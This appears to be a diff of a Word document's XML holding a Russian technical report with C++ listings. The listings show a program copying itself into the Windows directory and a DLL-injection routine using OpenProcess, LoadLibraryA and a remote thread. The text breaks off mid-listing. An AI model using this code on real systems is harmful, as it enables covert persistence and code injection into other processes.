+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>RegCloseKey(hk);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>else</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>std::cout &lt;&lt; "Error: Can't create RegKey." &lt;&lt; std::endl;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return false;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>GetModuleFileName(GetModuleHandle(NULL), currentPath, MAX_PATH);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>GetWindowsDirectory(sysbuf, MAX_PATH);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>strcpy(fileName, injectionDllName);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>strcat(sysbuf, fileName);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (!CopyFile(currentPath, sysbuf, false))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>std::cout &lt;&lt; "Error: Can't copy file:" &lt;&lt; std::endl;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>std::cout &lt;&lt; sysbuf &lt;&lt; std::endl;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>return false;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return true;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5.4 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Процедура инжекции библиотеки</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Инжекция библиотеки производится с помощью функции </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>bool Inject(DWORD pId, char *dllName)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – функция открывает существующий объект процесса с </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">идентификатором </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>процесса</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>pId</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Далее загружается адрес функции </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>LoadLibraryA</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> из динамической библиотеки </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>kernel32.dll</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>. После чего в открытом процессе выделяется память для инжектируемой библиотеки, и инжектируемая библиотека записывается в адресное пространство открытого процесса. Дистанционно создается новый поток в открытом процессе, выполняющий код инжектируемой библиотеки.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Возвращает значение </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">при успешной </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>инжекции</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, при ошибке возвращает значение </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>DWORD pId</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – идентификатор процесса для инжекции.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>char *dllName</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>имя инжектируемой библиотеки</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5.4.1 Листинг функции </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Inject</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>bool Inject(DWORD pId, char *dllName)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, false, pId);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (h)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>LPVOID LoadLibAddr = (LPVOID) GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (LoadLibAddr == NULL) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>std::cout &lt;&lt; "Error: the LoadLibraryA function was not found inside kernel3</w:t>
+      </w:r>
+      <w:r>
